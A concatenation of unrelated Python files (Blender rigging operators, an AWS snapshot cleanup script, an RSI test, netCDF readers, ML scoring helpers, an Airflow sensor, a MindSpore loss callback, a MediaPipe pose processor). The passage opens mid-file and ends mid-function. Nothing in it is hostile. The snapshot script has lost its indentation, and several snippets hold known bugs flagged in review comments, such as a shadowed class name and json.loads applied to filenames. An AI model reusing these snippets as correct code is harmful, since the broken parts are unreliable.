        # (The original repeated this membership test twice; once suffices.)
        if bname not in gen.pose.bones.keys():
            continue
        pb = gen.pose.bones[bname]
        copyPropGroups(rig, gen, pb)
        for fcu in fcus:
            fcu2 = copyDriver(fcu, pb, gen)
            changeBoneTarget(fcu2, assoc)

    # Fix correctives
    self.Correctives = [("ORG-"+rigi, daz) for (rigi, daz) in assoc]
    self.fixCorrectives(gen)
    self.checkCorrectives(gen)

    # Clean up: the generated rig takes over the DAZ rig's name.
    setattr(gen.data, DrawType, 'STICK')
    setattr(gen, ShowXRay, True)
    gen.DazRig = meta.DazRigType
    name = rig.name
    activateObject(context, rig)
    deleteObject(context, rig)
    if deleteMeta:
        activateObject(context, meta)
        deleteObject(context, meta)
    activateObject(context, gen)
    gen.name = name
    bpy.ops.object.mode_set(mode='POSE')
    print("Rigify created")
    return gen
def copyProp(self, prop, src, trg):
    """Copy one custom property from src to trg and, when supported, mark it
    overridable for library linking."""
    trg[prop] = src[prop]
    # Internal Daz/_RN properties are never exposed for library overrides.
    supports_override = hasattr(trg, "property_overridable_library_set")
    if supports_override and prop[:3] not in ("Daz", "_RN"):
        trg.property_overridable_library_set('["%s"]' % prop, True)
def getChildren(self, pb):
    """Return the names of all descendant bones of pb, depth first."""
    names = []
    for child in pb.children:
        names += [child.name] + self.getChildren(child)
    return names
def rigifySplitGroup(self, rname, dname, ob, rig, before, meta):
    """Split the vertex group dname of mesh ob into bend/twist deform groups,
    using the naming scheme of the target rigify version."""
    if dname not in ob.vertex_groups.keys():
        return
    bone = rig.data.bones[dname]
    # Pick the bend/twist group names for this rigify flavour.
    if not before:
        bendname = "DEF-" + rname + ".01"
        twistname = "DEF-" + rname + ".02"
    elif meta.DazPre278:
        # Old rigify: the .01/.02 infix goes before the .L/.R suffix.
        bendname = "DEF-" + rname[:-2] + ".01" + rname[-2:]
        twistname = "DEF-" + rname[:-2] + ".02" + rname[-2:]
    else:
        bendname = "DEF-" + rname
        twistname = "DEF-" + rname + ".001"
    self.splitVertexGroup(ob, dname, bendname, twistname, bone.head_local, bone.tail_local)
def mergeVertexGroups(self, rname, dnames, ob):
    """Rename the first vertex group of dnames (when present on ob) to the
    rigify deform group "DEF-" + rname."""
    if dnames and dnames[0] in ob.vertex_groups.keys():
        ob.vertex_groups[dnames[0]].name = "DEF-" + rname
def setBoneName(self, bone, gen):
    """Record on `bone` the names of its fk/ik and deform counterparts in the
    generated rigify rig `gen`.

    Sets, when the corresponding bones exist: bone.fkname / bone.ikname, and
    either bone.realname (single deform bone) or bone.realname1 /
    bone.realname2 (split bend/twist deform bones).

    Fixes vs. original: the two split-bone branches tested `defname` instead
    of `defname1`, which is always False at that point, so realname1/2 were
    never assigned; also removed bare `gen.data.bones[...]` lookups whose
    results were discarded.
    """
    fkname = bone.name.replace(".", ".fk.")
    if fkname in gen.data.bones.keys():
        bone.fkname = fkname
        bone.ikname = fkname.replace(".fk.", ".ik")

    # Single deform bone: "DEF-<name>".
    defname = "DEF-" + bone.name
    if defname in gen.data.bones.keys():
        bone.realname = defname
        return

    # Split deform bones, scheme 1: "DEF-<name>.01" / ".02".
    defname1 = "DEF-" + bone.name + ".01"
    if defname1 in gen.data.bones.keys():
        bone.realname1 = defname1
        bone.realname2 = defname1.replace(".01.", ".02.")
        return

    # Split deform bones, scheme 2: ".01"/".02" infixed before the suffix.
    defname1 = "DEF-" + bone.name.replace(".", ".01.")
    if defname1 in gen.data.bones.keys():
        bone.realname1 = defname1
        bone.realname2 = defname1.replace(".01.", ".02")
        return

    # Fallback: the bone kept its own name.
    if bone.name in gen.data.bones.keys():
        bone.realname = bone.name
#-------------------------------------------------------------
# Buttons
#-------------------------------------------------------------
class DAZ_OT_RigifyDaz(DazPropsOperator, Rigify, Fixer, BendTwists, B.Rigify, B.Meta):
    """Operator: convert the active DAZ armature to a full Rigify rig
    (createMeta followed by rigifyMeta)."""
    bl_idname = "daz.rigify_daz"
    bl_label = "Convert To Rigify"
    bl_description = "Convert active rig to rigify"
    bl_options = {'UNDO'}

    @classmethod
    def poll(self, context):
        # NOTE(review): classmethod, so 'self' is actually the class;
        # Blender convention is 'cls'. Enabled only for armatures that are
        # not already converted metarigs (no DazRigifyType set).
        ob = context.object
        return (ob and ob.type == 'ARMATURE' and not ob.DazRigifyType)

    def draw(self, context):
        # Options shown in the operator props panel.
        self.layout.prop(self, "useAutoAlign")
        self.layout.prop(self, "deleteMeta")

    def run(self, context):
        import time
        t1 = time.perf_counter()
        print("Modifying DAZ rig to Rigify")
        rig = context.object
        # Remember the name now: rigifyMeta deletes the DAZ rig.
        rname = rig.name
        self.createMeta(context)
        gen = self.rigifyMeta(context, self.deleteMeta)
        t2 = time.perf_counter()
        print("DAZ rig %s successfully rigified in %.3f seconds" % (rname, t2-t1))
class DAZ_OT_CreateMeta(DazPropsOperator, Rigify, Fixer, BendTwists, B.Meta):
    """Operator: build a Rigify metarig fitted to the active DAZ armature
    (first half of the conversion only)."""
    bl_idname = "daz.create_meta"
    bl_label = "Create Metarig"
    bl_description = "Create a metarig from the active rig"
    bl_options = {'UNDO'}

    @classmethod
    def poll(self, context):
        # NOTE(review): classmethod, so 'self' is the class; convention is 'cls'.
        ob = context.object
        return (ob and ob.type == 'ARMATURE' and not ob.DazRigifyType)

    def draw(self, context):
        self.layout.prop(self, "useAutoAlign")

    def run(self, context):
        self.createMeta(context)
class DAZ_OT_RigifyMetaRig(DazOperator, Rigify, Fixer, BendTwists):
    """Operator: run Rigify generation on an already-created metarig
    (second half of the conversion)."""
    bl_idname = "daz.rigify_meta"
    bl_label = "Rigify Metarig"
    bl_description = "Convert metarig to rigify"
    bl_options = {'UNDO'}

    @classmethod
    def poll(self, context):
        # Enabled only for objects carrying DazRigifyType (set by createMeta).
        return (context.object and context.object.DazRigifyType)

    def run(self, context):
        # Keep the metarig around (deleteMeta=False).
        self.rigifyMeta(context, False)
#-------------------------------------------------------------
# List bones
#-------------------------------------------------------------
def listBones(context):
    """Print each pose bone of the active armature as a
    '"name" : ("", "rotation_mode"),' line (ready to paste into a table)."""
    rig = context.object
    if not (rig and rig.type == 'ARMATURE'):
        raise DazError("Not an armature: \n'%s' " % rig)
    print("Bones in %s:" % rig.name)
    for pose_bone in rig.pose.bones:
        print(' "%s" : ("", "%s"),' % (pose_bone.name, pose_bone.rotation_mode))
class DAZ_OT_ListBones(DazOperator, IsArmature):
    """Operator: print the active armature's pose bones to the console."""
    bl_idname = "daz.list_bones"
    bl_label = "List Bones"
    bl_options = {'UNDO'}

    def run(self, context):
        listBones(context)
#----------------------------------------------------------
# Initialize
#----------------------------------------------------------
# All operator classes of this module; registered by initialize() and
# unregistered by uninitialize().
classes = [
    DAZ_OT_RigifyDaz,
    DAZ_OT_CreateMeta,
    DAZ_OT_RigifyMetaRig,
    DAZ_OT_ListBones,
]
def initialize():
    """Register the Daz/Rigify object properties and all operator classes."""
    rig_props = (
        ("DazRigifyType", StringProperty(default="")),
        ("DazRigType", StringProperty(default="")),
        ("DazUseBreasts", BoolProperty(default=False)),
        ("DazUseSplitNeck", BoolProperty(default=False)),
        ("DazPre278", BoolProperty(default=False)),
    )
    for name, prop in rig_props:
        setattr(bpy.types.Object, name, prop)
    for cls in classes:
        bpy.utils.register_class(cls)
def uninitialize():
    """Unregister every operator class registered by initialize()."""
    for operator_class in classes:
        bpy.utils.unregister_class(operator_class)
|
#!/usr/bin/python
from datetime import datetime, date, timedelta
import os
import sys; sys.path += ['/var/canvas/common', '../../common']
import yaml
from collections import defaultdict
from boto.ec2.connection import EC2Connection
from configuration import aws
def clean_backups():
"""
dumb script that cleans up all the duplicate ebs snapshots our two cron servers
create while backing up redis
"""
conn = EC2Connection(*aws)
snapshots = conn.get_all_snapshots()
shots = defaultdict(list)
for snapshot in conn.get_all_snapshots(owner=352407978521):
if snapshot.tags.get('Name') is not None:
t = snapshot.tags['Name']
ttype = ""
if 'Pink' in t:
ttype = 'pink'
elif 'Yellow' in t:
ttype = 'yellow'
dt = datetime.strptime(snapshot.start_time, "%Y-%m-%dT%H:%M:%S.000Z")
key = (ttype, dt.year, dt.month, dt.day)
val = snapshot.id
shots[key].append(val)
to_delete = []
for k, v in shots.iteritems():
if len(v) >= 2:
to_delete.append(v[0])
for d in to_delete:
print "deleting", d, "..."
conn.delete_snapshot(d)
if __name__ == '__main__':
clean_backups() |
from DeepModel.AlexNet import AlexNet, AlexCNN
from DeepModel.NNutil import *
from DeepModel.ResNet import Resnet_improve, ResNet_18
from DeepModel.ResNet_deeper import ResNet101, ResNet50, ResNet152
from DeepModel.ResNet_deeper import ResNet_deeper
from DeepModel.SimpleCNN import SCNN, LeNet5
from DeepModel.SimpleFullConnection import SFCN, SFCNet, Improve_SFCNet
from DeepModel.TextProcessing import bitwise_16, bitwise_8, bitwise_4, bitwise_32
from DeepModel.VGGNet import VGG, VGG_11
from DeepModel.data_preparation import data_loader
|
import netCDF4 as nc #case matters for importing netCDF4 module
import numpy as np
# read netCDF "metadata"
def open_netCDF_meta(path, key):
    """Return the global attribute ``key`` of the netCDF file at ``path``.

    Uses the Dataset as a context manager so the file handle is closed before
    returning (the original leaked one open handle per call); the attribute
    value is a plain Python object, so it remains valid after the close.
    """
    with nc.Dataset(path) as data:
        return data.__dict__[key]
# read netCDF "dimensions"
def open_netCDF_dimension(path,key):
    """Return the Dimension object named ``key`` from the file at ``path``.

    NOTE(review): the Dataset is left open here. The returned Dimension stays
    bound to the open dataset, so closing the file would invalidate it -- but
    this leaks one file handle per call. Confirm callers' lifetime
    expectations before adding a close.
    """
    data = nc.Dataset(path)
    return data.dimensions[key]
# read netCDF "variables"
def open_netCDF_variable(path, key):
    """Return the full contents of variable ``key`` from the file at ``path``.

    ``[:]`` materializes the variable's data (a numpy / numpy.ma array), so
    the dataset can safely be closed before returning; this fixes the
    original's leaked file handle. NOTE(review): the original comment asked
    for a conversion to a plain ndarray -- numpy.asarray would silently drop
    the mask of masked variables, so that is left to the caller.
    """
    with nc.Dataset(path) as data:
        return data.variables[key][:]
import unittest
import unittest.mock
import decimal
import prosperpy
def get_candles():
    """Build a chain of Candle objects from a fixed list of closing prices,
    linking each candle to the one before it via ``previous``."""
    closes = ['44.34', '44.09', '44.15', '43.61', '44.33', '44.83', '45.10', '45.42', '45.84', '46.08', '45.89', '46.03',
              '45.61', '46.28', '46.28', '46.00', '46.03', '46.41', '46.22', '45.64', '46.21', '46.25', '45.71', '46.45',
              '45.78', '45.35', '44.03', '44.18', '44.22', '44.57', '43.42', '42.66', '43.13']
    candles = []
    for item in closes:
        candle = prosperpy.Candle(close=decimal.Decimal(item))
        # The very first candle has no predecessor.
        if candles:
            candle.previous = candles[-1]
        candles.append(candle)
    return candles
class TestRelativeStrengthIndex(unittest.TestCase):
    """Tests for prosperpy.indicators.RelativeStrengthIndex against
    precomputed expected values for a classic 14-period example."""

    def test_relative_strength_index(self):
        # Seed the indicator with the first `period` candles, then feed the
        # remaining candles one at a time and compare each RSI update.
        period = 14
        candles = get_candles()
        # Expected RSI value after each post-seed candle, in order.
        data = ['66.24961855355508', '66.48094183471267', '69.34685316290870', '66.29471265892625', '57.91502067008556',
                '62.88071830996238', '63.20878871828775', '56.01158478954756', '62.33992931089785', '54.67097137765515',
                '50.38681519511423', '40.01942379131357', '41.49263540422286', '41.90242967845816', '45.49949723868043',
                '37.32277831337997', '33.09048257272346', '37.78877198205783']
        data = [decimal.Decimal(item) for item in data]
        # candles[0] has no `previous`, so the seed window starts at index 1.
        rsi = prosperpy.indicators.RelativeStrengthIndex(candles[1:period+1])
        self.assertEqual(rsi.period, period)
        self.assertEqual(rsi.value, decimal.Decimal('70.46413502109705'))
        for candle, value in zip(candles[period+1:], data):
            rsi.add(candle)
            self.assertEqual(rsi.value, value)

    def test_zero_average_gain(self):
        # With zero average gain the RSI must collapse to 0.
        period = 14
        candles = get_candles()
        rsi = prosperpy.indicators.RelativeStrengthIndex(candles[1:period + 1])
        rsi.average_gain = 0
        self.assertEqual(rsi.value, decimal.Decimal('0.0'))

    def test_zero_average_loss(self):
        # With zero average loss the RSI must saturate at 100.
        period = 14
        candles = get_candles()
        rsi = prosperpy.indicators.RelativeStrengthIndex(candles[1:period + 1])
        rsi.average_loss = 0
        self.assertEqual(rsi.value, decimal.Decimal('100.0'))
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
from python_to_you.models import Role
class Role():
    """Thin data-access wrapper around the Role model.

    NOTE(review): this class shadows the `Role` model imported on the line
    above, so inside these methods `Role` resolves to this wrapper class,
    not the model -- almost certainly a bug. Renaming this class (e.g. to
    RoleRepository) would fix it, but that changes the public interface, so
    it is only flagged here.
    """

    def __init__(self):
        # NOTE(review): because of the shadowing above, this stores the
        # wrapper class itself, not python_to_you.models.Role.
        self.role = Role

    def get(self, id):
        # Fetch a single role row by primary key.
        return self.role.query.filter_by(id=id).first()

    def create(self, user_id, is_admin):
        # Insert and commit a new role row.
        role = self.role(
            user_id,
            is_admin
        )
        self.role.session.add(role)
        self.role.session.commit()

    def update(self, user_id, is_admin):
        # NOTE(review): `id` here is the builtin function, not a parameter --
        # filter_by(id=id) cannot match a row; an `id` parameter is missing
        # from the signature.
        role = self.role.query.filter_by(id=id).first()
        role.user_id = user_id
        role.is_admin = is_admin
        role.session.commit()
"""
helper_fxns.py
by Benjamin Hamilton
------------------------------------------
A few helper functions that were aggregated from activities I found myself repeating.
Included are
- graphing feature importance (created for CatBoost but should work
with relevant sklearn models)
- mass scoring that generates a number of categorical scores, as well as
confusion matrices (it needs a loss. Perhaps add one later)
for CV and Holdout data
"""
# Import the usual suspects
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Scorers of various sorts
from sklearn.metrics import accuracy_score, confusion_matrix, f1_score, classification_report
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import make_scorer
def feature_imp(model, X, text=True, head=10, graph=True, title='Feature Importance', fgsz=(12, 12)):
    """Print and/or graph feature importances for a fitted model on dataset X.

    model: a fitted model exposing a feature_importances_ attribute
        (created for CatBoost but works with relevant sklearn models)
    X: the dataset the model was fit on, typically a DataFrame
    text=True: print the top feature importances
    head=10: number of rows of feature importances to print
    graph=True: draw a seaborn barplot of all importances
    title='Feature Importance': title of the graph
    fgsz=(12, 12): figure size; (12, 12) is good for close examination but
        (6, 6) may be better with many models in a single notebook
    """
    # Feature importances and feature names, one row per feature.
    importances = pd.DataFrame(model.feature_importances_)
    names = pd.DataFrame(X.columns)
    # Concatenate on the shared 0..n-1 integer index so each importance
    # lines up with its feature name.
    Mat = pd.concat([names, importances], axis=1)
    Mat.columns = ['features', 'importance']
    # (idiom fix: truthiness instead of `== True` comparisons)
    if text:
        print(Mat.sort_values('importance', ascending=False).head(head))
    if graph:
        sns.set_style('darkgrid')
        plt.figure(figsize=fgsz)
        ax = sns.barplot(x='features', y='importance', data=Mat)
        # Rotate tick labels so long feature names stay readable.
        ax.set_xticklabels(ax.get_xticklabels(), rotation=90)
        plt.title(title)
        plt.show()
# Mass Scoring Function
def mass_scoring(y, y_pred, title='Train'):
    """
    Input classification truth and predictions (not probabilities).

    Prints f1(micro)/acc, f1(weighted) and the confusion matrix, and returns
    X_scores = [prfs_micro, prfs_weighted], where each element is the
    (precision, recall, fscore, support) 4-tuple produced by sklearn's
    precision_recall_fscore_support with average='micro' / 'weighted'.
    (The original docstring described a flat 8-element list, which did not
    match the actual return value.)

    title='Train': Title of the data, such as 'CV', 'Holdout'
    """
    # precision, recall, f1 and support function from sklearn
    prfs_mic = precision_recall_fscore_support(y, y_pred, average='micro')
    prfs_wt = precision_recall_fscore_support(y, y_pred, average='weighted')
    # f1 is element [2] of each (precision, recall, fscore, support) tuple.
    # (Removed six unused locals that unpacked the remaining elements.)
    f1mic = prfs_mic[2]
    f1wt = prfs_wt[2]
    conf_mat = confusion_matrix(y, y_pred)
    # Print the f1/acc, f1(wt) and confusion matrix
    print('\n' + title + ' Data: ')
    print('f1(micro)/acc: ' + str(f1mic) + ', f1(wt): ' + str(f1wt))
    print('Confusion Matrix (' + title + '):')
    print(pd.DataFrame(conf_mat))
    return [prfs_mic, prfs_wt]
import matplotlib.pyplot as plt
import networkx as nx
import pdb
# Build the demo graph (insertion order matters for reproducible drawing).
G = nx.Graph()
for u, v, w in [('a', 'b', 0.6),
                ('a', 'c', 0.2),
                ('c', 'd', 0.1),
                ('c', 'e', 0.7),
                ('c', 'f', 0.9),
                ('a', 'd', 0.3)]:
    G.add_edge(u, v, weight=w)

# Split the edges by weight: heavy ones solid, light ones dashed blue.
heavy_edges = [(u, v) for u, v, d in G.edges(data=True) if d['weight'] > 0.5]
light_edges = [(u, v) for u, v, d in G.edges(data=True) if d['weight'] <= 0.5]

pos = nx.spring_layout(G)  # positions for all nodes

# nodes
nx.draw_networkx_nodes(G, pos, node_size=700)

# edges
nx.draw_networkx_edges(G, pos, edgelist=heavy_edges, width=6)
nx.draw_networkx_edges(G, pos, edgelist=light_edges,
                       width=6, alpha=0.5, edge_color='b', style='dashed')

# labels: annotate each edge with its weight (blank above 3; all demo
# weights are below 1, so every edge shows its weight).
edge_labels = {(u, v): str(d['weight'] if d['weight'] <= 3 else "")
               for u, v, d in G.edges(data=True)}
nx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')
nx.draw_networkx_edge_labels(G, pos, font_size=15, font_family='sans-serif', edge_labels=edge_labels)

plt.axis('off')
plt.show()
|
from . import BASE_CONTEXT
from .dataobject import DataObject, ObjectProperty, This
from .context_common import CONTEXT_IMPORTS
# ContextDataObject was moved to a separate module from Context to avoid a dependency
# cycle with dataobject
class ContextDataObject(DataObject):
    """ Represents a context """
    # Declared in the base context itself.
    class_context = BASE_CONTEXT
    # RDF type URI for contexts, rooted at the base namespace.
    rdf_type = BASE_CONTEXT.base_namespace['Context']
    # Contexts this context imports: self-typed (This), multi-valued,
    # linked via the shared CONTEXT_IMPORTS property.
    imports = ObjectProperty(value_type=This,
                             multiple=True,
                             link=CONTEXT_IMPORTS)
|
"""
container for the Periodicity estimator
"""
from typing import List
import librosa
import numpy as np
from automix.featureExtraction.estimator import Estimator, Parameter
from automix.model.classes.signal import Signal
class Periodicity(Estimator):
    """
    Estimator inferring the periodicity of a track.

    inputFeatures: list of signals
        The signals can be sparse or dense. Both the amplitude and the number
        of values on the period are taken into account.
    outputPeriod: a sparse signal with a value at each point on the period.
    parameterDistanceMetric: how the score for the peaks is computed
        RMS, sum, Veire (= sum * count)
    parameterFeatureAggregation: how the features are aggregated
        quantitative = each feature votes for its best phase (majority wins)
        qualitative = the per-phase scores of all features are summed
    """

    def __init__(self,
                 inputFeatures=["cqtAmplitudeCheckerboard"],
                 inputGrid="strongBeats",
                 outputPeriod="period",
                 parameterDistanceMetric="RMS",
                 parameterFeatureAggregation="quantitative",
                 parameterPeriod=2,
                 cachingLevel=2,
                 forceRefreshCache=True):  # As long as there is no way of updating the cache when the input changes
        self.inputs = [inputFeatures, inputGrid]
        self.outputs = [outputPeriod]
        self.parameters = {"period": Parameter(parameterPeriod), "distanceMetric": Parameter(parameterDistanceMetric), "featureAggregation": Parameter(parameterFeatureAggregation)}
        self.cachingLevel = cachingLevel
        self.forceRefreshCache = forceRefreshCache

    def predictOne(self, inputFeatures: List[Signal], inputGrid: Signal):
        """Return a 1-tuple holding a sparse Signal that keeps every
        period-th grid point, starting at the inferred phase."""
        period = self.parameters["period"].value
        phase = self.getPhase(period, inputFeatures, inputGrid)
        return (Signal(inputGrid.values[phase::period], times=inputGrid.times[phase::period], sparse=True), )

    def getPhase(self, period, features, inputGrid):
        """
        Get the phase of the track depending on all the features specified and the period.
        TODO: The phase should be computed with all the features combined, not
        with each feature independently.
        """
        # Equal weight per feature
        if self.parameters["featureAggregation"].value == "quantitative":
            # Each feature votes for its own best phase; the majority wins.
            phasePerFeature = []
            for feature in features:
                bestPhase = np.argmax(self.findPhaseLocal(period, feature, inputGrid))
                phasePerFeature.append(bestPhase)
            counts = np.bincount(phasePerFeature)
            quantitative = np.argmax(counts)
            return quantitative
        elif self.parameters["featureAggregation"].value == "qualitative":
            # Sum the per-phase scores of every feature, then take the best.
            overalScore = np.zeros(period)
            for feature in features:
                score = self.findPhaseLocal(period, feature, inputGrid)
                overalScore = np.add(score, overalScore)
            qualitative = np.argmax(overalScore)
            return qualitative
        else:
            raise Exception("bad feature aggregation parameter")

    def findPhaseLocal(self, period: int, signal: Signal, grid: Signal, toleranceWindow=0.1):
        """
        Find the score of each phase of the signal based on its amplitude at
        the grid positions and the number of peaks.

        - signal: works best with a discrete signal as no agglomeration is done
        - grid: positions of the beats
        - period: the periodicity to test
        - toleranceWindow: if not 0, the closest signal value to each grid
          position within the window is used

        test:
        # result = findPhase(Signal(np.ones(5), times=np.array([0, 4, 8, 9, 12])+1), Signal(np.ones(16), times=range(16)),
        period=4)
        # print(result) = 1
        """
        phases = []
        for phase in range(period):
            # Sample the signal at every period-th grid time, starting at `phase`.
            values = [signal.getValue(grid.times[i], toleranceWindow=toleranceWindow) for i in range(phase, len(grid), period)]
            values = [v for v in values if v is not None]
            if self.parameters["distanceMetric"].value == "RMS":
                value = np.sqrt(np.mean(np.array(values)**2))
            elif self.parameters["distanceMetric"].value == "sum":
                value = np.sum(values)
            elif self.parameters["distanceMetric"].value == "Veire":
                # Veire's method: reward both peak amplitude and peak count.
                value = np.sum(values) * len(values)
            else:
                raise Exception("Bad distance metric parameter" + self.parameters["distanceMetric"].value )
            phases.append(value)
        return phases
# p = Periodicity(parameterPeriod=4)
# print(p.predictOne([Signal(1, times=[5, 9, 14]), Signal(1, times=[6, 10])], Signal(1, times=range(30)))[0].times)
# print(p.predictOne([Signal(1, times=[5, 9, 6, 10, 14])], Signal(1, times=range(30)))[0].times)
|
# -*- coding: utf-8 -*-
"""A simple script for computing child model parameters and controller search space
complexities
ZZJ, 11.19.2019
"""
import numpy as np
def child_model_params(num_features, num_layers, max_units):
    """Rough parameter count of a child model.

    Counts the input-to-layer weights plus roughly half of the full
    layer-to-layer weight matrix (upper triangle of the connection grid).
    """
    input_weights = num_features * num_layers * max_units
    inter_layer_weights = (max_units * num_layers) ** 2 / 2
    return input_weights + inter_layer_weights
def controller_search_space(input_blocks, output_blocks, num_layers, num_choices_per_layer):
    """log10 of the controller search-space size.

    Sums the log-counts of: the per-layer operation choice, every possible
    skip connection (one binary choice per layer pair), and the input/output
    block assignment of each layer.
    """
    layer_choices = np.log10(num_choices_per_layer) * num_layers
    skip_connections = np.log10(2) * num_layers * (num_layers - 1) / 2
    block_assignments = (np.log10(input_blocks) + np.log10(output_blocks)) * num_layers
    return layer_choices + skip_connections + block_assignments
|
from typing import Dict
from airflow.sensors.base_sensor_operator import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from sai_airflow_plugins.operators.fabric_operator import FabricOperator
class FabricSensor(BaseSensorOperator, FabricOperator):
    """
    Sensor that runs a command on a remote host via the [Fabric](https://www.fabfile.org)
    library and succeeds if and only if the command's exit code is 0.

    Connection configuration comes from a standard `SSHHook`, exactly as in
    `FabricOperator`. The accepted parameters are the combined parameters of
    `FabricOperator` and `BaseSensorOperator`.
    """

    @apply_defaults
    def __init__(self, *args, **kwargs):
        # No sensor-specific state; defer to the cooperative MRO initializers.
        super().__init__(*args, **kwargs)

    def poke(self, context: Dict) -> bool:
        """
        Execute ``self.command`` over the configured SSH connection and check its exit code.

        :param context: Context dict provided by airflow
        :return: True if the command's exit code was 0, else False.
        """
        outcome = self.execute_fabric_command()
        self.log.info(f"Fabric command exited with {outcome.exited}")
        return not outcome.exited
|
import json
class Alpha:
    """Parses two JSON payloads at construction; `bar` copies fields from a peer object."""

    def __init__(self):
        # NOTE(review): json.loads parses a JSON *document*, not a file name;
        # the literal 'file_A' is not valid JSON, so this raises
        # json.JSONDecodeError. json.load(open(...)) may have been intended —
        # confirm before relying on this class.
        self.a = json.loads('file_A')
        self.b = json.loads('file_B')
        self.c = None
        self.d = None

    def foo(self):
        # Serializes self.d; the result is intentionally discarded (the call
        # only validates that self.d is JSON-serializable).
        json.dumps(self.d)

    def bar(self, dummy):
        # Copy the peer's fields, then validate the new self.d via foo().
        self.c, self.d = dummy.x, dummy.y
        self.foo()
class Beta:
    """Holds two JSON payloads (`x`, `y`) parsed at construction time."""

    def __init__(self):
        # NOTE(review): 'file_X' / 'file_Y' are not valid JSON documents, so
        # json.loads raises json.JSONDecodeError here — confirm whether
        # json.load on actual files was intended.
        self.x = json.loads('file_X')
        self.y = json.loads('file_Y')
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""LossMonitor Callback class."""
import numpy as np
from mindspore.common.tensor import Tensor
from mindspore._checkparam import Validator
from ._callback import Callback
class LossMonitor(Callback):
    """
    Monitor the loss in training.

    If the loss is NAN or INF, it will terminate training.

    Note:
        If per_print_times is 0, do not print loss.

    Args:
        per_print_times (int): How many steps to print once loss. During sink mode, it will print loss in the
                               nearest step. Default: 1.

    Raises:
        ValueError: If per_print_times is not an integer or less than zero.

    Examples:
        >>> from mindspore import Model, nn
        >>>
        >>> net = LeNet5()
        >>> loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')
        >>> optim = nn.Momentum(net.trainable_params(), 0.01, 0.9)
        >>> model = Model(net, loss_fn=loss, optimizer=optim)
        >>> data_path = './MNIST_Data'
        >>> dataset = create_dataset(data_path)
        >>> loss_monitor = LossMonitor()
        >>> model.train(10, dataset, callbacks=loss_monitor)
    """

    def __init__(self, per_print_times=1):
        super(LossMonitor, self).__init__()
        # Rejects negative or non-integer values (raises ValueError).
        Validator.check_non_negative_int(per_print_times)
        # Print interval in steps; 0 disables printing entirely.
        self._per_print_times = per_print_times
        # Global step number at which the loss was last printed.
        self._last_print_time = 0

    def step_end(self, run_context):
        """
        Print training loss at the end of step.

        Args:
            run_context (RunContext): Include some information of the model.
        """
        cb_params = run_context.original_args()
        loss = cb_params.net_outputs
        # Networks may return (loss, ...) tuples/lists; take the first element
        # when it is a scalar-convertible Tensor.
        if isinstance(loss, (tuple, list)):
            if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):
                loss = loss[0]
        # Reduce a Tensor loss to a plain Python float (mean over elements).
        if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):
            loss = float(np.mean(loss.asnumpy()))
        # 1-based step index within the current epoch.
        cur_step_in_epoch = (cb_params.cur_step_num - 1) % cb_params.batch_num + 1
        # Abort training as soon as the loss diverges.
        if isinstance(loss, float) and (np.isnan(loss) or np.isinf(loss)):
            raise ValueError("epoch: {} step: {}. Invalid loss, terminating training.".format(
                cb_params.cur_epoch_num, cur_step_in_epoch))
        # In a disaster-recovery scenario, cb_params.cur_step_num may be rolled
        # back to a previous step and become less than self._last_print_time, so
        # self._last_print_time is wound back until printing can resume.
        if self._per_print_times != 0 and (cb_params.cur_step_num <= self._last_print_time):
            while cb_params.cur_step_num <= self._last_print_time:
                self._last_print_time -=\
                    max(self._per_print_times, cb_params.batch_num if cb_params.dataset_sink_mode else 1)
        # Print when the configured interval has elapsed since the last print.
        if self._per_print_times != 0 and (cb_params.cur_step_num - self._last_print_time) >= self._per_print_times:
            self._last_print_time = cb_params.cur_step_num
            print("epoch: %s step: %s, loss is %s" % (cb_params.cur_epoch_num, cur_step_in_epoch, loss), flush=True)
|
import cv2
import numpy as np
import mediapipe as mp
# Seed NumPy's global RNG so any randomized processing is reproducible across runs.
np.random.seed(123)
class Point(object):
    """
    Class to denote a joint in 2-D space

    Arguments:
        x, y : x-axis and y-axis co-ordinates
        visibility : visibility score of the joint
    """

    def __init__(self, x=0.0, y=0.0, visibility=0.0):
        self.x = x
        self.y = y
        self.visibility = visibility

    def __add__(self, other):
        # Component-wise sum; the combined visibility is the mean of both scores.
        return Point(self.x+other.x, self.y+other.y, (self.visibility+other.visibility)*0.5)

    def __sub__(self, other):
        # Component-wise difference; visibility is still the mean (a difference
        # of points is only as visible as the joints it was built from).
        return Point(self.x-other.x, self.y-other.y, (self.visibility+other.visibility)*0.5)

    def __mul__(self, num):
        # Scalar multiplication only; visibility is unaffected by scaling.
        # isinstance replaces the original `type(num) is int/float` checks
        # (same accepted values; bool, an int subclass, now also acts as 0/1).
        if isinstance(num, (int, float)):
            return Point(self.x*num, self.y*num, self.visibility)
        raise AttributeError("Multiplication allowed only with scalars")

    def __repr__(self):
        return "x=%f y=%f visibility=%f" %(self.x, self.y, self.visibility)
class FrameProcessor(object):
    """
    Class containing utility methods for processing a frame and returning its
    featurized form (normalized distance, angle and visibility features of
    body joints detected by MediaPipe Pose).
    """

    def __init__(self):
        self.mp_pose = mp.solutions.pose
        self.mp_drawing = mp.solutions.drawing_utils
        self.mp_drawing_styles = mp.solutions.drawing_styles
        # Landmark names, in the exact order unpacked by get_frame_features().
        self.point_names = ['NOSE','LEFT_SHOULDER','RIGHT_SHOULDER','LEFT_HIP','RIGHT_HIP',
            'LEFT_ELBOW','RIGHT_ELBOW','LEFT_WRIST','RIGHT_WRIST','LEFT_KNEE','RIGHT_KNEE',
            'LEFT_ANKLE','RIGHT_ANKLE','LEFT_FOOT_INDEX','RIGHT_FOOT_INDEX']

    def _get_frame_landmarks(self, frame):
        # Returns the landmarks if a pose is detected in the given image frame array, else None.
        with self.mp_pose.Pose(static_image_mode=True, min_detection_confidence=0.3,
